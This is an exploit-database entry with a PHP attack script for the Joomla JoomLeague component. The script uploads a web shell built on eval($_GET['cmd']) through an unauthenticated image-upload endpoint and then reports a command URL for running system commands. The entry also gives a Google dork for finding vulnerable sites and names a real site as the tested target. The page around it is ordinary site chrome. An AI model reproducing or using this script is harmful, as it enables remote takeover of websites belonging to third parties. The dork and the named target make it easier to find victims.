Joomla Joomleague Shell Upload

2013.11.01
Credit: wantexz
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:com_joomleague

# Exploit Title: joomla com_joomleague execute arbitrary PHP code Exploit # Google Dork: inurl:com_joomleague # Date: [01-11-2013] # Exploit Author: wantexz # Vendor Homepage:http://www.joomleague.net/ # Software Link: http://www.joomleague.net/index.php?option=com_jdownloads&Itemid=104&view=viewdownload&catid=2359&cid=242&lang=en # Version: com_joomleague # Tested on: [wantexz] # CVE : # target tested: http://badminton.loiret.free.fr//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php ############################################################################################ # INDONESIANCODER # by # WANTEXZ # ############################################################################################ <?php # com_joomleague ~ Exploit # http://indonesiancoder.com/ # echo <<<EOT # ----------------------------------- #/ com_joomleague ~ Exploit \ #\ Author: wantexz / # ----------------------------------- ################################################################################################ # Author: WANTEXZ # # thank to : Don tukulesto,Arianom,Cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,Blie ,KaMtiEz, # Mboys,Contrex,Alsastrow,Gebleh,Kido,Pathloader , Jerinx # Indonesiancoder, kill-9 crew, Jatimcom , malangcyber , Magelangcyber # ################################################################################################ EOT; $options = getopt('u:f:'); if(!isset($options['u'], $options['f'])) die("\n Usage example: php IDC.php -u http://target.com/ -f IDC.php\n -u http://target.com/ The full path to Joomla! -f IDC.php The name of the file to create.\n"); $url = $options['u']; $file = $options['f']; $shell = "{$url}//components/com_joomleague/assets/classes//tmp-upload-images/{$file}"; $url = "{$url}//components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php?name={$file}"; $data = "<?php eval(\$_GET['cmd']); ?>"; $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1', 'Content-Type: text/plain'); echo " [+] Submitting request to: {$options['u']}\n"; $handle = curl_init(); curl_setopt($handle, CURLOPT_URL, $url); curl_setopt($handle, CURLOPT_HTTPHEADER, $headers); curl_setopt($handle, CURLOPT_POSTFIELDS, $data); curl_setopt($handle, CURLOPT_RETURNTRANSFER, true); $source = curl_exec($handle); curl_close($handle); if(!strpos($source, 'Undefined variable: HTTP_RAW_POST_DATA') && @fopen($shell, 'r')) { echo " [+] Exploit completed successfully!\n"; echo " ______________________________________________\n\n {$shell}?cmd=system('id');\n"; } else { die(" [+] Exploit was unsuccessful.\n"); } ?>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top